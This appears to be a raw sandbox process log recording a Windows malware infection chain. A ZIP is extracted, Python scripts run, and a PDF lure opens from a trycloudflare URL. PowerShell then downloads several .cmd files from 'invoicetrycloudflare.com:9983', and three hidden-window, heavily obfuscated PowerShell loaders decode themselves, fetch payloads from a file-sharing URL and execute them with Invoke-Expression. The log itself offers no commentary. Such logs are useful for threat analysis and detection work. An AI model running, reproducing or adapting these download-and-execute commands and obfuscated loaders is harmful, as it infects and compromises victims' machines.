C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe time.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe kam.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe update.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe upload.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe info.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://floor-contemporary-genius-accommodation.trycloudflare.com/VB.pdf

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6224,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=5632 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/update.cmd' -OutFile 'C:\Users\Admin\Downloads\update.cmd' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/las.cmd' -OutFile 'C:\Users\Admin\Downloads\las.cmd' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Helvetica='Sub';$Helvetica+='strin';$Finn81 = 1;$Helvetica+='g';Function Enkeltvis($Fuldstndigheden){$Outgrin=$Fuldstndigheden.Length-$Finn81;For($Hegnstraad=5;$Hegnstraad -lt $Outgrin;$Hegnstraad+=6){$Merkonomernes+=$Fuldstndigheden.$Helvetica.Invoke( $Hegnstraad, $Finn81);}$Merkonomernes;}function Surfeiting($Retsinstituts){ .($Mindevrdig105) ($Retsinstituts);}$Unadduced=Enkeltvis ' .ateMbekrioMitzvzSelekiLnmodlKongel .assa,igar/Spher5 Inhe.Tigge0 ishe Tal,u(Sou hWN nsuiSu.stnresyndcatacoUptilwTarmks Dame Ind,aN FremTAvia, P ula1.enai0aliza.S aer0R,vio; blin AppeaWFor.uimil,snSty,o6Appul4Trimp;Len,m Proc.x inau6 Over4Nyans;Creod KinemrAnurivTreef: Rig.1Poeti2 Epiz1Woman.Scolo0 D ga) ,til B.rseG kilseRadiacTorvekVaernoFiske/Bldgr2Fe.lb0U,spo1 Brkr0,ateg0Oprrs1 Fler0Eno,a1 Klar De,iaFLophoiPlurarsneezeNedstfPolypoSeriex Domk/ nsul1 Afvn2Eamon1Bese..Homo,0coc,a ';$Naturtalent=Enkeltvis 'WilliU T,knsKje eeResenrOverd-Stat.A Sc ugSo omeUropanBaandtO ers ';$Blokbeskyttelsen=Enkeltvis 'F,annhBrepitElliptPrerepSupersAlien:Frabe/ ispe/Rili.wLam,awDucklwSwann.CoendsPantoe Fi,sn FlakdPalmes pacep,lodtaKernicDesceeZithe.Tvangc P.otoSpinemModes/Un elpgnotorTermooMaudl/ Umbed tasl.enpe/Water0Lingeu BladoArtisjka.itxUnjub0B.pre ';$Faggy=Enkeltvis ' enne>Brems ';$Mindevrdig105=Enkeltvis 'S.mafiAmmo,eInterxmefis ';$Imparsonee='Fugio';$stedsbiords = Enkeltvis 'AfridePla,tcDyndshSubsto nneu Op at%F rbrasyltepPlanop ForpdidoloaNektotNyligaLgdom%Fleur\VurdeCEshjboIsta,rDay odAperiifri,ea temu.TatovGUdvika S inrLmmel ro h&Defro&Limit Pre.eOmladcCreodhWi raoBandb FnokstMasse ';Surfeiting (Enkeltvis 'Foreg$GrippgRedellNigg o DesebPeroxa SniglNonde: ikriRlimmoeFun.mlXanthiUdk leWild vTittie Pones Indv2Yea,l2Noege4 Subm=repro(Fo.ebcCon,umbrutad ioxi Invad/IndhacIndre L.bsk$Ddel,sKoshetLabioeModstd AlpesNonrebFrdigiPlaneo Ovulr X,rad.amles Unfo) Tarm ');Surfeiting (Enkeltvis 'Count$Pegm,gdistrlFugt,oAnalob S.araAsseml Myo : AnalFFadseeThrashDishoa AcquaDyrefrCystoeSpirinMod.teStigmsSnobb=Stran$AvisuBKiltil ClicoAsocikPli tb Gaste.ommeslhegnkHearsyFluortRaag,t emie TanklVldigs leareF.edbnMonol.Kances erispbehvel .oreibutiktSolsp(d.cty$LangtFEmblaaPjaskgjob egB.twayknk,e),elvs ');$Blokbeskyttelsen=$Fehaarenes[0];$Racerbiler= (Enkeltvis ' Dys,$Kons g Nonelte,rao S,atbNoncoaLyretlTypef:AconuHA omaeDomingSlagin overs,ynantlivsarRaj,gaContaaKa,otdPoly eSpe.inAnpri=EstasNS receConstw Rott- Ut,tODas.ebAbekaj N deeEuryacFrafatFissi ,heraS NonvyUoplssQuay.tSlumse PepomMi jo.StatiN,arveeop.retDisso.,athoWUnd.ie S,gubIdmmeC indelOmstniGenuseAd.ctnCoalit');$Racerbiler+=$Relieves224[1];Surfeiting ($Racerbiler);Surfeiting (Enkeltvis ' Fdev$r sibHtriteePat.ogLa,drnSporosAdusttChronrAnnexaUnitaavandadMine eSkibsnOverh.AstraH Ultre PistaSvirrdBer ne tatr CarbsBeh,v[ .opi$NonprNMangeaCerebt PsycuDiscorOutbrtPrejuaTarmplKyphoePaadrnParr tCorre]Elmas=Reole$Di.fuURownen RostaEx redReba,dSkrmsuRemiscIntereBil.edSprng ');$Cartogrammes=Enkeltvis ' Drou$PlkkeHStatieSpurrgGrusvnDiplosButtettaagerDevotaStrenaPaperd.resseandennCross.UndivD monooImpliw.raekn.anonlInfaloMultia LegadSy crFFr,vriUnsellBambue Reac(Embed$DreadBSkolilChuppoA,bjnkSpannbMet,le RabasSnivekZ.druyBellat HooktinveceNoninlgaj gsUnderePre cnLease,Colle$ UndeFFuldas Ho.ntfors,nBejleeBaandsSdsup)Beski ';$Fstnes=$Relieves224[0];Surfeiting (Enkeltvis ' F.tn$Pr ntgBilanl latho C,asb.olstaChuntlTachy:CubanAErhveuLdrepkUnno,tAfskriCasemo.orman MonssT ansh MoraaKillilModst=Combu(KlageTFornjemakulsT.mmet Homi-Volu PFrdigaPr,bltEtre h Chec Stvn.$ThyreFNonrespr vitNippynHet reRig rsUnder)Toyfe ');while (!$Auktionshal) {Surfeiting (Enkeltvis ' Bere$OxyhegElverlAhrimoSkraabTilbaaGenarlKlein:SquidGChaffeVkstbnAd,nifs.ndroForsvrPeptitMonkslOkkerl korei a,mrnOddmeg E keeAntirn Unbrsnu,se=sjlev$salt,tIndl.r Nonpu ungdeR.akt ') ;Surfeiting $Cartogrammes;Surfeiting (Enkeltvis 'SjldeSRuefutSengeaGgesnrUnwortRock.- revSudfoelFerreeS,mmeeJulekpBizar .nti4Polit ');Surfeiting (Enkeltvis 'B,mbo$ ighpg.aiselB.ttoo Opskb Ch,raGalgelUnma.:Jade,AUngouuDengskKaim tR,alliP.nsio ulfanBrikesExp,ihTourna rklalAflgg=Hoard(Dr,ftT ObedeSmaassSkjo tUdste-PtomaP Exenaprivat.ostuhsubr, Casp.$ TaruFTrivssb waitExecun.ntiseHogwasB,gge)g lop ') ;Surfeiting (Enkeltvis 'Docks$SulkiglivfulStokvoC.rrob TangaF.senl Niev:v sumHFersiacarcilM thovEftertTur,eaMagesnDa.kogS bspeB rbenPosektNonameSonnerArchd=Heste$ProtegJ.nvilErnrioHesitbJems,a.avonl Nonp:roicgN Unlods uder D ageDjrven UfoedEks.reTuris+Ralli+Bu.ca%Stb.u$LavstF asbreNongrh s abaExempaNachtr,aricefixivn ,unseSnrklsEmpir.Cartec PhleoM rstuUrinanCl gwtGomph ') ;$Blokbeskyttelsen=$Fehaarenes[$Halvtangenter];}$Isopleura=307994;$Exciton=29049;Surfeiting (Enkeltvis 'capri$m gicgRoanplSlagtoUdstybEt,gra.illelUnsto:rekonHg ngseSpu vdBadevnudsttiAvlsfnRestlg Nau,eA.thrr ,hgrnFogedeHent. Fire=Tidsp P.eemG U,deeSt.tstKllin-Stjf.COutbao mparnUop.ytBest,eHemianmortitTi,la Stand$PorraFLoph.sf.rdyt,pecinTelefeBasilsFl dg ');Surfeiting (Enkeltvis 'Silan$Leg,mgSkovllTit,loHvinebJudaha HeadlBl.ds:,acheSA,sioaMennelRecoogAlg fb U dla.naugrSkovseUnwherB skeeLoofisCompr ykel= Gune Forh.[ U,veS.uadryDre.esUnpubtBiokee R,sem,akni.WrongC arbooTurbinGesjfvuncule andrManagtHypov]Konst:Codev: MammFSadder.ngago Def.m Pu,sBBarfoaEksprsPe.eteBe ha6Skurk4KuijpSCommutAyinpr RestiTransnGemligForud(Magaz$Tffe,HKni,kesnowsd DagtnCherripolyunabwabg enhaeAntr,rKafeenFlyveeSplin)lo de ');Surfeiting (Enkeltvis 'Clada$PreingMajlilHarrooApropbgjorda Ov,rlJ.sco: ThruBOprrsyAlpingMas egPrvekeUn rerEgepaeBlotcnMicrotAcan,eSupernGawke Acnid=Devon Aaste[unscaSUds,rySmarasYnkvrtprod eHie omarbej.EkspeT ShmeeUndewxF,ldetFies..CheniE SpednSterncRacegoHonord KlniiRationVerbogSuppl]Pla,s:Arter:misdiA InteS TenoCF,rsnIO ienINarro.Vati,GLandveIsa.etHabitSSneg,t Secrr Af ai Sen,nSideggEfter( Fors$RestiSCerataSocialOgeesgHyperbHvepsaSarrar.etere PostrHa.loeB,llisFaeca)Frugt ');Surfeiting (Enkeltvis 'Autop$s aragTimefl EsthoStvk.b,heomaMaddelInstr:KljesITork.nSiametSkispePylorrFif,eaSubtocEcd stRettniSupero SearnAngreiFi.trs Trfom Cali= Flad$ Bil.BMyselyStri.g Autog ZaraeAn,iar Va.deregnsn Ku rtAfsejeSp dsnBugta.Hungeso.ernuMargibPtelesCapstt Pa,prHoke i Afbon FormgR val(Fortr$proteInoninsL.terovice pSolidl MudreRjseruT.aner.accuaTerra,Keelh$Am laEFanatx Sme.cFritaiBry,gtsodeaoUdm,gnPre,r)d,por ');Surfeiting $Interactionism;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/xff.cmd' -OutFile 'C:\Users\Admin\Downloads\xff.cmd' }"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cordia.Gar && echo t"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/zap.cmd' -OutFile 'C:\Users\Admin\Downloads\zap.cmd' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Dmoner='Sub';$Dmoner+='strin';$Hensigtsmssigt = 1;$Dmoner+='g';Function Gustatorially($Dybgangens){$lymphangiitis=$Dybgangens.Length-$Hensigtsmssigt;For($Parthbr=5;$Parthbr -lt $lymphangiitis;$Parthbr+=6){$Detailprojekter+=$Dybgangens.$Dmoner.Invoke( $Parthbr, $Hensigtsmssigt);}$Detailprojekter;}function Udtrringers192($Tenophony){ . ($Femdobbelte) ($Tenophony);}$Ulvemorens=Gustatorially 'D,gdrMAmusgoProtozFuseniRigsalCut.alStudbaMisau/Fugni5Model.s.opp0Ko,hi fl e(Pr fiWLskniiGlossnstanddVideooS.hemwMoca,s Gade MultiNN terTRechr Pu,kt1Unde,0 alsl.Ar,br0Opmaa;oplys OkinaWSt,amiPl,inn A,er6Ku,ha4Skjal;Skild RadicxUnive6Sgeor4Whit.;Scale R,llyrRiddev.blat:Estop1 Teks2Is.ga1Tarti. Bh.g0Hier.)Hoved SiderGalliaeTima cGrusvkPreseoUncov/S,sse2 Rege0Ivana1Kolon0Iowah0 Flyv1Svag 0No.au1Gamme Sp llFM,ffiiSouthrGu abeAly.sfAppero Cam,xDamna/Fyrin1 ousi2Whela1Bogkl.bomhu0udma ';$Folktale=Gustatorially 'FlskeU ArissAkkoretweetr Smul- PresASemipgFyr,ne Overnp nsptGenn ';$brnesder=Gustatorially 'HovmehCi.ert.isretPar,spFemh.s Unsu:Salut/Konfi/canonwphlogwCephawGu.hi.ClerksUltimeRhabdnIagt.dCakews VivipSemiaaVerdoc Intee elie.Samfuc ,nydo Indsm,crew/ Ulcep ErysrAspenoInjur/mlposd HydrlFort,/Assastsolo.rSpi l8KrydscGangw2A eksxFlota ';$Lnudvikling134=Gustatorially ' ovti>S mmo ';$Femdobbelte=Gustatorially 'PurkeiVoksdeUnperxLno.e ';$Forholdende='Legemsbygnings';$Cycledom = Gustatorially ' brode Xeroc TaenhHo,ieoVlskb Semiu%Pap ca U enp BhutpInvigdSporoaUdfrstAnti.aGeck.%.heop\Yog,tEFra.otDrifthParaleZan,ar Tak,ivtafssBelg.eLnninrForgasNon.x.Uk ndOPorcepStraasKuns Bagag&Grund&Sacri T.inkeSu,ercUnde hVaabeoHj,ed .ulnitsvige ';Udtrringers192 (Gustatorially 'Palae$FldebgVendelSpecioH licbDi.piaAfgudl Trav:TuberJS raduSarcovH wseeApiphnflasheHiccusElatccSubseeTysten StrutElytr=S ksi(D.pencGirthmArci dAfkli Hyeto/Stru.c.ekrt Ru e$PhotoC.fslayDat.ccmyelilSonede endodTormeoTillemGring)Moder ');Udtrringers192 (Gustatorially '.aras$Ma,drgMagislLovteo,aperbStrafa Lu.tlmatal:KlderPEkstrastandrTingsiLukratattemeIns,stSkrifeUncanr rintnPolyseKobl,=Pleu,$d,ababElec,rAktion edeleMahogsT.uttdForfje Ne.trEskap. nvens Icyfp BirdlMentai Unint Fibe(bruce$Fnys,LGoavenSal.suOthe dVolumv Styri KonfkRe islJizyai .ulgn Ove,gAn im1Se.io3Anuri4An.im)Fritn ');$brnesder=$Pariteterne[0];$Spndingsfelts203= (Gustatorially 'Stru.$Spiltg Clo.lUndero BodabRerouaMisvilfor u:Kn,psOMessiu,iscotRe,rowAnlg r SkrmeHi tosPotbot ElevlSta,eeP esh2 ustr3Semim3 Mela=Or,itNBlodse Pac.wfa.lt-I,dreOStabibBa nejEffaceHemmec Del.tStvle SubmeSBlehay ForksHov,dtaa,nieSuperm Geog.Isaf,NHeksee Strit.mord.BruskWNydane AppebSprucCLorunl uropiSandkeBen.hn attt');$Spndingsfelts203+=$Juvenescent[1];Udtrringers192 ($Spndingsfelts203);Udtrringers192 (Gustatorially 'White$AllevO Mgbuu E,datUkuraw a,marOpdrie yerssHai.ht P,iolBrepieLovke2Nedre3 Gaus3Epoxy. DambH Anj,eHaanda LededSwatheForgrrVeeresKvaje[Modar$ MakuFDommeoCognalMyth.kDoddetTtesaa,traclBredse.nfla] Tele=Sjl n$VoiceUGearslIntrov UheleArsenmOdor,oa.starpointeBuc snOrg,nsT.gen ');$Arabine=Gustatorially ' Semi$AbnegOstambuOli.rtT mliwIndvirVerite DecisVelmat N.guludd,leMenui2 Rigs3Hjspn3polym.CeltiDBrepio CertwBjerrnCh rilPharsoAsteraIncapd EcclFGeneriNonfalBibl,eF,nat(.arni$overibPolemrBondenFla,beRimp,sSalamd SerieMe.vrramnio, p,nc$ prajEB.sman astfcTopkioBalleuM.mmin Joust,undbe SeporPileneattriru ifl)Out,e ';$Encounterer=$Juvenescent[0];Udtrringers192 (Gustatorially 'Ac,ou$Skovhg rddelungdoo,urvlbSilenaNonasl mo t:Hjae.FCats.oTilb,rAartie SiftsDemonh fibuoTouchwKvindn Sque=betel(G,napT HelgeMisers En.jtbolth- distPFarv a Ve,it Adoph Sync Batti$SinfuEHjeman Do ecGadedobe ieuKre.snKorrittoryseToityrUnsufeDubbirEpigr).tepg ');while (!$Foreshown) {Udtrringers192 (Gustatorially 'A.ena$ Su.pgTilralBestioPawnbbCalycaF lmllFragt:StrapE Kri,nCamert FormrBudgee yreas Do.p=Parke$Faglit,remdr erneuTosseekunde ') ;Udtrringers192 $Arabine;Udtrringers192 (Gustatorially 'HjemgSbohawtTer,aaCanunrProagtAmfit-presiS BobalBakkeeLerk,ehognopCarbo ,ilit4Iland ');Udtrringers192 (Gustatorially ' Illu$OxidagT,keml AnasoDelfibcontea Indrl Calc:BookrFinseco FderrApio.e rifsRecidhRoueco ImprwMtaalnManha=Cheso( TeleTUncome U,easCompatCleri-GravePTrappaQuarttSpeakhgen.p tomga$Un,ryEJurymn Ect,cMountotempeu Kbesnu ptit ElveeNobbirMesteeSnowsrTholl)int o ') ;Udtrringers192 (Gustatorially 'f,jlt$MataegmegallAtomsoSk.anbPettia Ju,ilDuod,: stilDDeanei .lgesLectreEkspedBrackiP,dalf .rehyGr,as3Stand7Marga=Acrid$O jusgG ronlU.conoInkambForsga T.dsl Aggr: FlorKV.calaFolkesStamckSkftne PastlOvereo eawatKapactFasteeS iranRendy+ P.in+Tem.n%Unwir$TalekPHelbraPredirDkketi Salit TimeePhonet.onine Bradr Pik.n Sjage,fatt.S,natcVermuoArvemuRes,nnP nsit U,nt ') ;$brnesder=$Pariteterne[$Disedify37];}$Biosociological=318639;$Rundbue=29425;Udtrringers192 (Gustatorially ' Over$SyndegGitril LeonoFlunkbTr rea,aktrl Opga:ProteFOutheyKnoxvr Endes,vingtRealiiKamern U.fodKommue PosisForhi2Teleg2 aker0Tests Sekan=corna DesocGbic.peKnasttBu.df-,lvtjCEgetro aakrnRed.ct StjaeProklnDowertHeck, Morge$sateeE Taxan.oddecvoeproVa,beuSandenKaraftlensge RevirFangeePal trNicol ');Udtrringers192 (Gustatorially 'Efter$ eakagSl,nil Ubego oteebAflydaEtuvelSubdu:PneumfNor.aiEnjoyrBeskfeBrestaPretrarinderTronasBalledArbejrSpi,eeCodfinrifligKompae Stat Glim= .rub Indga[SubriSUnin yTeknis BeautCapseePoonsmNrhed. EireC,ntieo,ancenskattvAfskeeOverfr IdentJoyan]ticki:Oopod: Ep.xFAfsk,rSkellodevotmHjertBSubtraprotosSrilae Evan6Sulam4 espS Pr,etOmfavr LuftiYardwnDisgugFe lb(morki$EfterFAs eny.fterrD marsHetertNona iSwellnGudfadNeosse Sta,sA gum2 Klin2Negro0Stoke)Kl en ');Udtrringers192 (Gustatorially 'Amaya$ TampgConfilOprreoUnmenbru,peapaaf.l Grad:,ekstTVejlohHasslaBetonlSk.ezamon,msPostgsPostlijorden AcomiTabu,dV lndiFe.tiaSpe ln Ther Badel=Broil Tanno[I.revSLeukoy Abs sSchertA,bumeForekm Prel.a.cesTret.ieLoka.xRabbitisido..ntaeECapitnBeed,cVikaroTerridInvitiEx,rinFi algBourg]Pensi:Fugtp:Sc,weAShackSBe.agCAchroIBoldeI.praa.Stra GOutsleVortitS effS ,umetklun.rBondsiSkrivn UnimgTnder( Gab,$Persef Episi ,ymprBeslueGazelaHandeaGl,rmr urrsAtolsdBere,r PlomeSt aln Fluog Wageeteist)Dislo ');Udtrringers192 (Gustatorially 'fle s$ OvergHyosclGene.oWh teb irkaVikkil Dogm: CreaCgerrie Kal rA.lega BegamM temaBoba l ocia=Balte$Fors TTraphhDisila ermol pfora,npinsS.vblsO teoiAds,lnOpticiarc edRecomis iriaSamm,n efou.UnwetsTestauStyreb FanasSkriftThermrulseliMiliensupe.gjudah(,nfer$EfterBexhusi loudou,errsDegreoSunnicFikekiApokooSympolOverfo,lkevgSlantiHenvec S,aaaPrci.lTotal,Nonch$SamfuRBikseu,azhynEpoped Afdebvilliu MuckeHnse )Brost ');Udtrringers192 $Ceramal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/kam.cmd' -OutFile 'C:\Users\Admin\Downloads\kam.cmd' }"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Etherisers.Ops && echo t"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

